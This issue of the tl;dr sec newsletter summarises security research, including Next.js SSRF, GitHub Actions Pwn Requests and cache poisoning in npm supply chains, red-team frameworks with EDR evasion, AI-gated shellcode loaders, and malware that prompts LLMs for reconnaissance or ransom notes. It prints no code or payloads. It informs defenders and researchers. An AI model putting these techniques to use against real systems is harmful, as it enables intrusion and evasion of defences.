- tl;dr sec
- Posts
- [tl;dr sec] #302 - LLM Honeypot Catches Threat Actor, Supply Chain Compromise Survey, AI-powered Malware
[tl;dr sec] #302 - LLM Honeypot Catches Threat Actor, Supply Chain Compromise Survey, AI-powered Malware
Deceiving attackers with an LLM SSH honeypot, root cause analysis of 2024/2025 supply chain compromises, malware leveraging AI for stealth/better effectiveness
Hey there,
I hope you’ve been doing well!
🚕 CAB
This week Semgrep had our Customer Advisory Board (CAB), where I got to hang out with and learn from a bunch of security leaders from cool companies, some of whom I use their products.
(Sidenote thought to early career folks: living in the Bay Area in general has been good for meeting people at so many companies, it’s crazy.)
I especially enjoyed having candid, off-the-record conversations about how security programs are being run, what’s going well, what’s tough, and what’s next.
It seems like there’s some skepticism about AI, but broadly optimism and interest.
People were already prototyping things like automating alert triage, helping developers migrate to paved paths, design doc reviews, and even complex agentic workflows.
We also moved into our new office this week. Very strange, feeling like a real company 😆
We threw an office opening party and somehow the mayor of San Francisco was there? 🤷 See the web version for a photo of me with Daniel Lurie (H/T Margaret for taking it).

“Semgrep: San Francisco’s favorite SAST.” -Daniel Lurie did not say this
P.S. Semgrep’s new office is in downtown SF, let me know if you want to stop by sometime.
Sponsor
📣 5 Minutes to a More Secure Google Workspace
Stop guessing about Google Workspace risk. Get a clear, five-minute readout with Material’s free Security Scorecard. Receive a risk score, domain-specific analysis across email, files, accounts, and global configurations, plus a prioritized to-do list. No integrations or permissions required. Built from real-world incidents protecting hundreds of orgs. Built for lean teams, IT owners, and CISOs. Benchmark your Google Workspace security posture and fix your most critical security gaps.
Nice, I like quick scorecards and tailored, actionable advice/handy to-do lists 👍️
AppSec
Next.js Security Testing Guide for Bug Hunters and Pentesters
DeepStrike’s Daoud Youssef provides a guide to penetration testing Next.js applications, covering the framework's core features (server-side rendering, static site generation, incremental static regeneration, middleware, API routes) and common security vulnerabilities, including: server-side and client-side template injection, XSS, CSRF, sensitive data leakage via __NEXT_DATA__
, cache poisoning, SSRF (image components, Server Actions), retrieving the source map, and dependency confusion.
See also this example insecure Next.js app to test on.
Next.js and the Mutated Middleware
RootSys’ Dominik Prodinger describes an SSRF vulnerability in Next.js (CVE-2025-57822) that occurred when user-controlled headers are insecurely passed to middleware using NextResponse.next()
. The bug allows attackers to control HTTP methods, set arbitrary headers, and observe full responses, enabling SSRF attacks, cache poisoning, and even leaking sensitive internal headers like Vercel OIDC tokens from affected applications.
See also Rachid.A’s post: Next.js and the corrupt middleware: the authorizing artifact.
Startup Security: A Framework From Series B to F Funding
Experience-earned insights from Tad Whitaker on building security at startups from Series B to F funding, covering team structure, essential programs, and resource allocation. He recommends prioritizing securing your environment, customer, and employee data over product security features initially, hiring a Product Security Architect early, and maintaining security-to-employee ratios of 1:60 for medium-risk companies, and investing in IT for cost-effective risk reduction.
Tad also shares thoughts on security operations, GRC, and product security teams, security advocacy programs, penetration testing, strategic projects, risk assessment, security champions, budgets, metrics, and more.
Sponsor
📣 Stop Malicious Packages Before They Install
Tired of wondering if your next install is pulling in malware? Socket Firewall blocks zero-day malicious packages before they can hit your system or CI build, including transitive dependencies you didn’t even install directly. It’s 100% free, works out of the box, and doesn’t need an API key or setup. Just prefix your install command with sfw. It works with npm, yarn, pnpm, pip, uv, cargo, and more to protect your installs from the next supply chain attack.
I included Socket Firewall last week because it seems like a smart approach to an attack class that keeps coming up. Super cool that it’s free & no API key required 🤘
Supply Chain
A Retrospective Survey of 2024/2025 Open Source Supply Chain Compromises
Filippo Valsorda collected all 2024/2025 open source supply chain compromises he could find and categorized their root cause: phishing (5 cases), control handoff to attackers (3-4 cases), and GitHub's pull_request_target and issue_comment workflow triggers (3+1 cases), and more.
Essential mitigations for professional maintainers: implement phishing-resistant authentication (passkeys/WebAuthn), avoid control handoffs, and eliminate privileged attacker-controlled GitHub Actions triggers (e.g. pull_request_target
).
💡 I love this systematic, ecosystem-level review and focusing on the meta causes and potential solutions.
We Hacked the npm Supply Chain of 36 Million Weekly Installs
Roni Carta and Adnan Khan discovered critical GitHub Actions vulnerabilities in cross-fetch (20M weekly downloads) and GraphQL-JS (16M weekly downloads) that would have allowed attackers to steal NPM tokens and publish malicious packages.
They exploited "Pwn Requests" (executing arbitrary code from pull requests in privileged workflows) combined with "Cache Poisoning" (seeding malicious files into GitHub Actions caches that would later be restored in privileged jobs), using tools like Depi (for dependency tree resolution) and Gato-X/Cacheract (for exploitation) to demonstrate how attackers could escalate from opening a pull request to publishing rogue versions of these popular JavaScript libraries.
💡 I applaud the remarkable restraint of Roni and Adnan to not move to a country with weak extradition policies, turn black hat, and use all of the ridiculous access they’ve been able to gain through supply chain attacks to backdoor most of the Internet for $profit.
Blue Team
google/osdfir-infrastructure
Helm charts for running open source digital forensic tools in Kubernetes.
Currently supports: Timesketch for collaborative forensic timeline analysis, Yeti for DFIR and threat intelligence tracking, OpenRelik (a platform that streamlines collaborative digital forensic investigations), GRR for incident response and remote live forensics, Hashr to build your own hash sets based on your data sources, and dfTimewolf for orchestrating forensic collection.
A Practitioner’s Field Notes on Google Workspace’s Blind Spots
Shasheen Bandodkar describes blind spots in Google Workspace security, highlighting risks in identity management (over-privileged accounts, unrotated API keys, MFA limitations), data governance (shadow IT, gen AI data governance, orphaned files and runaway sharing links), and third-party app ecosystems (unvetted apps, OAuth token revocation isn’t automatic, encrypted files bypass defenses). The post concludes with hardening recommendations.
💡 TIL: Uninstalling a Google Workspace app doesn’t automatically revoke the OAuth tokens the app was granted?! 🤯 🫠
Red Team
dobin/DetonatorAgent
By Dobin Rutishauser: A cross-platform web API for red teamers that executes malware on VMs and collects EDR logs to determine if initial access chains would be detected.
0xflux/Wyrm
By @0xfluxsec: An open-source, Rust-based post-exploitation red team framework designed to compete with tools like Cobalt Strike, Mythic, and Sliver, featuring: custom below-TLS encryption to defeat perimeter inspection tools, anti-sandbox techniques, dynamic payload generation, IOC encryption to assist in anti-analysis and anti-YARA hardening, and more.
AI + Security
How I Almost Got Hacked By A 'Job Interview'
David Dodda describes how he nearly fell victim to a sophisticated LinkedIn scam targeting developers through a fake coding interview from a seemingly legitimate blockchain company. Before running npm start
he prompted Cursor: "Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."
And it found some sneaky obfuscated code that downloads malware and steals crypto wallets, files, and passwords. Yikes!
💡 Super cool that a straightforward prompt was sufficient to discover some malicious backdoor code. I’d be curious what percent of the time this is effective.
SSH LLM Honeypot caught a real threat actor
Mario Candela walks through how the LLM-powered honeypot Beelzebub (GitHub) can trick a threat actor into revealing their tactics and infrastructure. Mario configured an SSH-based honeypot and observed the threat actor downloading several binaries with known exploits from a compromised Joomla CMS server, attempting to execute a Perl script to connect the server to a botnet, and he was able to retrieve the IRC channel details that were being used for command and control.
💡 In issue #214 I called out Galah, an LLM-powered web honeypot by Adel Ka. I think this idea is very promising- LLMs can simulate high quality deception environments that can be programmatically monitored so high quality TTPs can be automatically extracted.
The emerging use of malware invoking AI
Wiz’s Scott Piper examines recent malware campaigns that invoke AI within their payloads, including LameHug (which prompts HuggingFace for system reconnaissance commands), the Amazon Q Developer Extension compromise (delete all files and cloud resources), s1ngularity (a supply chain attack using Claude, Gemini, and Q to locate sensitive files), and PromptLock (used an LLM to understand the files on the system and make decisions from that, including generating a personalized ransom note).
These attacks were largely ineffective due to LLM guardrails, and the attackers likely could have achieved better results by pre-generating code rather than relying on generating the code at runtime using AI. But this does likely indicate early steps toward potential agentic AI malware that could adapt to environments.
AI Gated Loader: Teaching Code to Decide Before It Acts
SpectreOps’ John Wotton introduces the idea of “AI gated loaders”, a new approach to shellcode execution that collects telemetry (does this host look like a real user workstation or a sandbox? Is Defender or other monitoring active?), applies policy with an LLM, and executes only when OPSEC rules are met.
The Hybrid Autonomous Logic Operator (HALO) project demonstrates this technique by gathering system snapshots (processes, network activity, user presence signals), prompting an LLM for a JSON decision with confidence score, and enforcing fail-closed execution that aims to provide red teams with safer, more realistic simulations compared to traditional loaders that execute blindly regardless of EDR presence.
💡 Neat idea and awesome that they’ve open sourced this. I wonder if HTTP calls to a model provider from a random (e.g. marketing) user’s machine would stand out, and OSS models are probably too big to send 🤔 Maybe you just tunnel the traffic / obfuscate it like normal C2 traffic.
Misc
Feelz
AI
Replit CEO Amjad Masad interviews Alex Hormozi on Entrepreneurship in the Age of AI - Woo very brief Semgrep shout-out towards the end when Amjad references Replit using Semgrep to scan agent-written code. Something I’m involved with in an Alex Hormozi video?!? Life goal accomplished 🥰
If every US vehicle performed like Waymo, we’d prevent 33,000-39,000 deaths annually and save $0.9-1.25 trillion in societal costs.
Claude’s Agent Skills - Claude can now use Skills to improve how it performs specific tasks. Skills are folders that include instructions, scripts, and resources that Claude can load when needed.
OpenAI launched ChatGPT Atlas - A browser with ChatGPT built in
Andrej Karpathy on Dwarkesh Patel - Why reinforcement learning is terrible, why AGI will just blend into the previous ~2.5 centuries of 2% GDP growth, why self driving took so long to crack, and what Andrej sees as the future of education.
Massive Andrej response tweet after the episode, Daniel Miessler’s response blog.
karpathy/nanochat: A full-stack implementation of an LLM like ChatGPT in a single, clean, minimal, hackable, dependency-lite codebase 🤯
Politics / Privacy
Matthew Guariglia: “I spent the week at the police surveillance convention and let me tell you my biggest observation: The name of the game now is consolidating as much information as humanely possible from surveillance devices, the internet, other governmental data, and literally a million other places.”
404 Media - Hackers Dox Hundreds of DHS, ICE, FBI, and DOJ Officials - Scattered LAPSUS$ Hunters posted the apparent phone numbers and addresses of hundreds of government officials, including nearly 700 from DHS.
404 Media - ICE, Secret Service, Navy All Had Access to Flock's Nationwide Network of Cameras- Tens of thousands of AI-enabled cameras that constantly track the movements of vehicles (and thus people).
ICE bought vehicles equipped with fake cell towers to spy on phones
Stingrays may have been used to surveil protesters at the Portland ICE facility, which could identify individual protesters and track their movements. TIL about “Marlin” devices that can be used to detect stingrays.
Chinese state-backed hackers have been lurking in F5’s systems since 2023, and downloaded source code and info about undisclosed vulnerabilities. F5’s customers include government agencies and 85% of the Fortune 500 🫠
“After gaining initial access through F5 BIG-IP software in 2023, the hackers moved to the company’s VMware virtual machines and infrastructure in order to achieve persistent access. The hackers then went virtually quiet for more than a year, a tactic typically used to thwart companies that stop retaining expensive logs after about a year.”
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!
Cheers,
Clint
P.S. Feel free to connect with me on LinkedIn 👋